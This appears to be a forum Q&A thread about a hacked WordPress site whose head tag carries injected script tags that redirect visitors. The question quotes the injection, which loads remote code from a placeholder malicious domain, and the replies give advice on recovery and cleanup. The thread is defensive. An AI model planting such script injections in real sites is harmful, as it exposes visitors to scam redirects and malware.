# Delete a script from WordPress

Tags: html, wordpress

I think my WordPress site has ben hacked. When try to go to my site the antivirus shows me an alert listing my site as scam and the sites redirect to another page that is not mine. I looked into the code using the element inspector of Google Chrome and I found a script into the head tag of the site which redirect to other site when the site finishes the load. I want to remove this fragment of code, but I can't find where this script is added. Does anyone know how to delete this fragment of code from the head tag?

I want to delete this code:

```
<head>
    <script src="http://malisussiteexample.com/take"></script>
    <script src="http://malisussiteexample.com/take"></script>
</head>
```

Comment: Probably best not to share malicious links in the body of your post. Either way, if your site was compromised you probably have more serious issues than just undoing their changes. How do you know they don't still have access, or have modified the scripts to re-apply the modification itself? Unless you're going to scour the entire codebase on your server, you most likelky want to blow it away and start over (and change out any keys/passwords/etc).

Comment: thanks for the observation, im gonna to edit my question and i think that the hackers have access to wp-admin panel, i changhed all my password and tryied to get suport direct to my hosting provider but they said to me that is nothing to do.

Comment: The only safe way to fix this is to completely delete your site's files and database, change your cpanel and other hosting service passwords, restore your site from a known-good backup, then change all your WordPress user passwords. It's remotely possible that an infosec expert could remove the malicious corruption in your site, but it would take many hours of expert work. Bad news, I know.

Answer (score 0):

This happens due to a malware program called Balada Injector. The code you wrote is only the HTML injection part. Check if there are any other inline obfuscated scripts. Also check if there are any new admin users (created by the malware).

Then,

- Through WordPress dashboard, deactivate and delete all the installed plugins.
- Install & activate each plugin from the dashboard or upload a clean copy from a working backup.

These may be enough, It is not very easy to tell how to recover completely, since there are many infection vectors and scenario, and most of them are impossible to detect without full access.